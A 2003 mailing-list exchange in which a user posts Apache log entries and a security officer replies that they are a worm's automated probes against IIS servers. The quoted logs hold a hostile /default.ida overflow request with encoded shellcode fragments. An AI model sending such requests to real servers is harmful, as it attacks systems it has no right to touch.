Re: found this in my /var/log/apache/access.log

Sun, 04 May 2003 10:15:39 -0500 

It's a trojan virus that tries to find any IIS vulnerable using random IP.
This is itself not a dangerous attack (of course, if you have a IIS around, it 
is), indeed it is not intended to be for you.

"Konstantin Filtschew" <[EMAIL PROTECTED]> writes:

> hi,
>
> found this in my /var/log/apache/access.log, what does that mean:
>
> 217.37.212.241 - - [04/May/2003:15:17:22 +0200] "GET
> /default.ida?XXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u
> 9090
> %u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b
> 00%u
> 531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 277 "-" "-"
> 217.128.213.22 - - [04/May/2003:14:50:16 +0200] "GET
> /default.ida?XXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u
> 9090
> %u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b
> 00%u
> 531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 277 "-" "-"
> 217.218.66.141 - - [04/May/2003:13:39:56 +0200] "GET
> /default.ida?XXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u
> 9090
> %u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b
> 00%u
> 531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 277 "-" "-"
> 212.65.17.26 - - [04/May/2003:06:30:32 +0200] "GET
> /.hash=680d6f5c4d584f6b5d941a
> f136938db3751a840b HTTP/1.1" 404 324 "-" "-"
> 212.65.17.26 - - [04/May/2003:06:30:32 +0200] "GET
> /.hash=e175a0da67b1fefbb5acd8
> cdc7ccc516ede015d1 HTTP/1.1" 404 324 "-" "-"
> 212.65.17.26 - - [04/May/2003:06:30:32 +0200] "GET
> /.hash=8c10ba0aae81edb7ae51eb
> 156b2fcb770b66864a HTTP/1.1" 404 324 "-" "-"
>
>
>
> thx for help
>
> Konstantin Filtschew
>
>
>
>
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
>

-- 
Andres Roldan, CSO
Fluidsignal Group

Reply via email to